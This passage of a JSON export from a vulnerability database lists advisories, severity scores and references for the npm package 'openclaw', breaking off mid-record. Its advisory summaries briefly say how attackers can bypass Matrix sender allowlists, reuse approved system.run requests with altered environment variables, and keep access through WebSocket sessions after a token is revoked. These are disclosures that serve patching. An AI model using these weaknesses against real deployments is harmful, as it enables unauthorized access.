rm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerabilit
y":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerabilit
y":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerabilit
y":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35662","GHSA-x2cm-hg9c-mf5w"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1728-wc17-dud6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89969?format=json","vulnerability_id":"VCID-1j3m-fecr-f7cn","summary":"OpenClaw: Matrix thread root and reply context bypass sender allowlist\n## Summary\nMatrix thread root and reply context bypass sender allowlist\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Real in shipped v2026.3.28 Matrix because fetched thread-root/reply context bypasses sender allowlists, with unreleased mainline filtering fix.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8a563d603b70ef6338915f0527bee87282c3bad5` — 2026-03-31T17:09:03+01:00\n\nOpenClaw thanks @AntAISecurityLab for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41376","reference_id":"","reference_type":"","scores":[{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04376","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.0439","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04402","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41376"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8a563d603b70ef6338915f0527bee87282c3bad5","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:35Z/"}],"url":"https://github.com/openclaw/openclaw/commit/8a563d603b70ef6338915f0527bee87282c3bad5"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L
/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rg8m-3943-vm6q","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:35Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rg8m-3943-vm6q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41376","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41376"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-matrix-thread-context-allowlist-bypass-via-sender-validation","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S
:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:35Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-matrix-thread-context-allowlist-bypass-via-sender-validation"},{"reference_url":"https://github.com/advisories/GHSA-rg8m-3943-vm6q","reference_id":"GHSA-rg8m-3943-vm6q","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rg8m-3943-vm6q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VC
ID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VC
ID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41376","GHSA-rg8m-3943-vm6q"],"risk_score":3.0,"exploitability":"0.5","weighted_severity":"5.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1j3m-fecr-f7cn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91324?format=json","vulnerability_id":"VCID-1kk2-t48u-zkb2","summary":"Duplicate Advisory: OpenClaw Node system.run approval context-binding weakness in approval-enabled host=node flows\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-hjvp-qhm6-wrh2. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.26 contain an approval context-binding weakness in system.run execution flows with host=node that allows reuse of previously approved requests with modified environment variables. 
Attackers with access to an approval id can exploit this by reusing an approval with changed env input, bypassing execution-integrity controls in approval-enabled workflows.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/10481097f8e6dd0346db9be0b5f27570e1bdfcfa","reference_id":"","reference_type":"","scores":[{"value":"2.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/10481097f8e6dd0346db9be0b5f27570e1bdfcfa"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-approval-context-binding-weakness-in-system-run-via-host-node","reference_id":"","reference_type":"","scores":[{"value":"2.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-approval-context-binding-weakness-in-system-run-via-host-node"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32058","reference_id":"CVE-2026-32058","reference_type":"","scores":[{"value":"2.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:
X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32058"},{"reference_url":"https://github.com/advisories/GHSA-cjq8-m7wj-xmq9","reference_id":"GHSA-cjq8-m7wj-xmq9","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cjq8-m7wj-xmq9"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hjvp-qhm6-wrh2","reference_id":"GHSA-hjvp-qhm6-wrh2","reference_type":"","scores":[{"value":"2.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hjvp-qhm6-wrh2"}],"fixed_packages":[],"aliases":["GHSA-cjq8-m7wj-xmq9"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1kk2-t48u-zkb2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90837?format=json","vulnerability_id":"VCID-1p3b-pfnn-x7ad","summary":"Duplicate Advisory: OpenClaw's device removal and token revocation do not terminate active WebSocket sessions\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-2pr2-hcv6-7gwv. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.28 fails to disconnect active WebSocket sessions when devices are removed or tokens are revoked. 
Attackers with revoked credentials can maintain unauthorized access through existing live sessions until forced reconnection.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/7a801cc451e9e667b705eeccff651923a1b8c863","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/7a801cc451e9e667b705eeccff651923a1b8c863"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2pr2-hcv6-7gwv","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2pr2-hcv6-7gwv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34503","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}]
,"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34503"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-on-device-removal-and-token-revocation","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-on-device-removal-and-token-revocation"},{"reference_url":"https://github.com/advisories/GHSA-89hr-6x2p-8xjv","reference_id":"GHSA-89hr-6x2p-8xjv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-89hr-6x2p-8xjv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-